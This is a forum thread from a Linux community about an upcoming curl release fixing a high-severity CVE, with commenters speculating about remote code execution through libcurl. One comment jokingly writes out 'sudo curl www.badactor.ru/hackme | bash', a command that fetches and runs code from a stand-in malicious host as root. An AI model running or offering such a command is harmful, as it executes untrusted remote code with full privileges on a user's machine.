this post was submitted on 04 Oct 2023
132 points (99.3% liked)

Linux

48208 readers
790 users here now

From Wikipedia, the free encyclopedia

Linux is a family of open source Unix-like operating systems based on the Linux kernel, an operating system kernel first released on September 17, 1991 by Linus Torvalds. Linux is typically packaged in a Linux distribution (or distro for short).

Distributions include the Linux kernel and supporting system software and libraries, many of which are provided by the GNU Project. Many Linux distributions use the word "Linux" in their name, but the Free Software Foundation uses the name GNU/Linux to emphasize the importance of GNU software, causing some controversy.

Rules

Related Communities

Community icon by Alpár-Etele Méder, licensed under CC BY 3.0

founded 5 years ago
MODERATORS
 

cross-posted from: https://biglemmowski.win/post/224873

Posted on twitter by Curl author Daniel Stenberg - https://nitter.cz/bagder/status/1709103920914526525

We are cutting the release cycle short and will release curl 8.4.0 on October 11, including a fix for a severity HIGH CVE. Buckle up.

... But this time actually the worst security problem found in curl in a long time

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38545

you are viewing a single comment's thread
view the rest of the comments
[–] PowerCrazy@lemmy.ml 2 points 1 year ago (4 children)

I don't see how a vulnerability in Curl can exist at all unless it's privilege escalation (you don't run curl as root do you?) And if it's not a privilege escalation, then it sounds like it's just a "root user can do things that you can do as root, possibly unintended" which isn't a vulnerability at all.

sudo curl www.badactor.ru/hackme | bash !!!!

[–] nathris@lemmy.ca 10 points 1 year ago (3 children)

Could be an RCE exploit. Doesn't matter if it's privilege escalation at that point because it can be used to execute a payload that can.

[–] taaz@biglemmowski.win 2 points 1 year ago* (last edited 1 year ago)

To top it of it seems it's also contained in libcurl, and getting RCEd just by doing a request does not sound fun.

load more comments (2 replies)
load more comments (2 replies)